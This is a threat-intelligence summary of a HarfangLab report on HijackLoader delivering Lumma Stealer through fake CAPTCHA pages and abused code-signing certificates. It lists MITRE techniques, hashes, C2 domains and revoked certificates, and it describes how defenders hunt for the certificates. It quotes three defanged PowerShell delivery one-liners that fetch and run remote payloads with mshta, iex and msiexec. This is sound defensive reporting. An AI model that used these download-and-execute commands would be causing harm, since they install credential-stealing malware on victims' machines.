Keypoints
- Since mid-September 2024, Lumma Stealer has been increasingly deployed via the HijackLoader loader.
- Infection begins with a fake CAPTCHA page that coerces victims to run clipboard-pasted PowerShell commands.
- Three PowerShell delivery variants were observed: mshta.exe, raw PowerShell with iex, and msiexec.exe for silent download/execution.
- Initial deployments used DLL sideloading packages to run a HijackLoader DLL that decrypts and executes an encrypted payload.
- A signed, standalone HijackLoader binary was observed on 2024-10-02, showing low detection rates until the signing certificate was revoked.
- HarfangLab used C2 pivoting and metadata heuristics to identify multiple abused code-signing certificates and additional signed malicious samples.
- Abused certificates from several companies (Lider LLC, Hangzhou Rongyi, Shanghai Yungpu, LLC SEVER, Xi’an Tengyuanri) were reported and revoked.
MITRE Techniques
- [T1059] Command and Scripting Interpreter – PowerShell and other scripting hosts were used to retrieve and execute payloads (‘PowerShell execution via scripts.’).
- [T1059] MSHTA execution – mshta.exe is used to execute malicious code from a remote URL (‘Use of mshta.exe: The script leverages the Microsoft HTML Application Host to execute malicious code from a remote URL.’).
- [T1059] Windows Installer execution – msiexec.exe was used for silent download and execution of payloads (‘Use of msiexec.exe: The script also employs the Microsoft Windows Installer to silently download and execute a payload from a remote URL.’).
- [T1122] DLL Sideloading – HijackLoader is executed via DLL sideloading inside a package containing a legitimate binary and a malicious DLL (‘DLL sideloading to execute HijackLoader.’).
- [T1071] Application Layer Protocol – Compromised samples communicate with command-and-control servers for further instructions (‘Communication with C2 servers for further instructions.’).
- [T1003] Credential Dumping / Credential Access – Lumma Stealer is deployed to harvest credentials from infected hosts (‘Deployment of Lumma Stealer to harvest credentials.’).
Indicators of Compromise
- [Hash – signed sample] Example signed HijackLoader SHA-256 – 1839b7152814b16b9f28326081f16bf9c5bbbb380005232c92d25c9a3e36e337, f158c65261bcab6e93927a219d12f596a4e40857bbd379f9889710ea17251e5e, and 70 more hashes.
- [Domain / C2] Command-and-control hostnames – me3ar40.quickworld[.]shop, quickworld[.]shop.
- [Certificate thumbprint] Abused code-signing certificates – 2DD67214D7C7274458CFECC78E4B51063869D8E3 (Lider LLC), FDD829D3B46933EF8015B70B6C3FCE6BA9675578 (Shanghai Yungpu Chemical Co.), and 3 more thumbprints.
- [Certificate subject] Abused signing names – Lider LLC, Hangzhou Rongyi Network Technology Co., Ltd., Shanghai Yungpu Chemical Co., Ltd., LLC SEVER, Xi’an Tengyuanri Network Technology Co., Ltd.
- [Repository] Associated IOCs published – GitHub repository with full IOC set: https://github.com/HarfangLab/iocs/tree/main/abused_certs_hijackloader
The technical infection chain begins with a malicious web page presenting a fake CAPTCHA. When a victim clicks the “I’m not a robot” prompt, a popup instructs keyboard shortcuts that open a command prompt and paste a PowerShell one-liner from the clipboard; this PowerShell then downloads a ZIP, extracts it, and runs a binary. HarfangLab observed three PowerShell delivery variants in the wild: mshta.exe launching remote code (mshta hxxps://payload[.]url/…), raw PowerShell using Invoke-Expression to execute remotely fetched scripts (iex (iwr hxxps://payload[.]url/a.txt -UseBasicParsing).Content), and msiexec.exe invoked to silently fetch and install payloads (msiexec.exe /fv hxxps://payload[.]url/DB2jh /q).
Analyzed ZIP payloads frequently contained a DLL sideloading package composed of a legitimate executable, a malicious sideloaded DLL, and sometimes an additional data file. The sideloaded DLL (HijackLoader) typically decrypts and executes an encrypted payload bundled in the package, which then downloads and launches a stealer implant (Lumma Stealer). On 2024-10-02 HarfangLab also observed a non-sideloaded, genuinely code-signed HijackLoader binary; its signature initially reduced detection rates until the signing certificate was revoked, after which detections improved.
For hunting abused certificates, HarfangLab pivoted from known C2 domains (quickworld.shop) to search telemetry for signed executables contacting those hosts, discovering multiple malicious signed samples and abused certificates. They further pivoted on executable metadata (original name, description, copyright) using heuristics: treat a signed binary that reuses metadata from an unsigned legitimate app as suspicious, and treat a binary reusing metadata but signed by a different certificate than the legitimate app as suspicious. This iterative process uncovered multiple abused certificates (Lider LLC, Hangzhou Rongyi, Shanghai Yungpu, LLC SEVER, Xi’an Tengyuanri), which were reported to issuers and revoked to restore detection coverage.
Read more: https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/